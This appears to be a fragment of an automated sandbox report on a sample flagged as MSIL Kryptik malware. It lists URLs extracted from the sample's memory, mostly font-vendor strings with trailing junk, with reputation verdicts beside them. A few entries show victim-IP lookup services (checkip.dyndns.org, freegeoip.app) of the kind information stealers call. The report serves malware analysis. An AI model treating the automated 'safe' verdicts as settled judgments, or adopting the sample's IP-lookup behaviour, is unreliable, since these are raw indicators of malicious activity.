http://www.fontbureau.comcomF8hd	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353734380.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354215467.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354138837.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354002677.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353944829.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353874368.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354300800.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346182160.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346883664.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346256859.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347028490.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346759481.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347092731.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346973547.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comce/li	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354483757.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353734380.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354215467.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355070094.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355923706.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353609947.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355479066.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354659505.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355787965.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355587469.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355263828.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354866721.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354138837.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.352677508.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354002677.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353023886.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353202982.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354748764.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.356055521.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355370104.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355735494.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353734380.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353609947.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353874368.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.comoitu	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353734380.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353609947.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353023886.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353202982.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353944829.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.352949197.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353439899.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353874368.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353305139.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://freegeoip.app/xml/84.17.52.15x	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000002.606537804.0000000003316000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/jp/8hd	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349659079.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349972984.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349919972.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350141461.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349799819.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350198641.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349567418.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349754657.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350022254.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349869464.0000000005F64000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/t	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349659079.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349972984.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349919972.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350141461.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349799819.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350198641.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349567418.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349456760.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349754657.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350022254.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349869464.0000000005F64000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stackoverflow.com/q/2152978/23354rCannot	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.434562162.0000000003239000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.434179664.00000000030FB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cnW	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347463858.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.orgD8Wk	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000002.606537804.0000000003316000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.com~	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348081227.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348527607.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348291004.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348167056.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347907945.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347791626.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348471851.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://checkip.dyndns.org4Wk	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000002.606451041.0000000003271000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn)	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347663096.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347164026.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348081227.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348700807.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348527607.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348291004.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346883664.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348167056.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347319272.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347028490.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346759481.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347907945.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347609249.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347463858.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347791626.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348471851.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347092731.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346973547.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347557474.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348761376.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347203168.0000000005F64000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comI.TTFZi	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355070094.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354659505.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354866721.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354748764.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354957925.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355132775.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.comCoi	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348527607.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348471851.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comF8hd	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355070094.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353609947.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354866721.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.352677508.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353023886.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.352522038.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353202982.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354957925.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.352949197.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353439899.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353305139.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cnQ	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346883664.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347028490.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346759481.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346973547.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346639113.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/?	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cnCo	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347609249.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347463858.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347557474.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/bThe	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.comar	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347663096.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348081227.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348167056.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347907945.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347609249.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347791626.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/jp/li	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349659079.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349972984.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349919972.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350141461.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349799819.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350198641.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349754657.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350022254.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349869464.0000000005F64000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347028490.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.com6	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348700807.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348527607.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348761376.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodfont.co.kr	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346045053.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/Y0tr	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350523960.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349659079.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350352934.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350660943.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349972984.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349919972.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350431962.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350141461.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349799819.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350740231.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 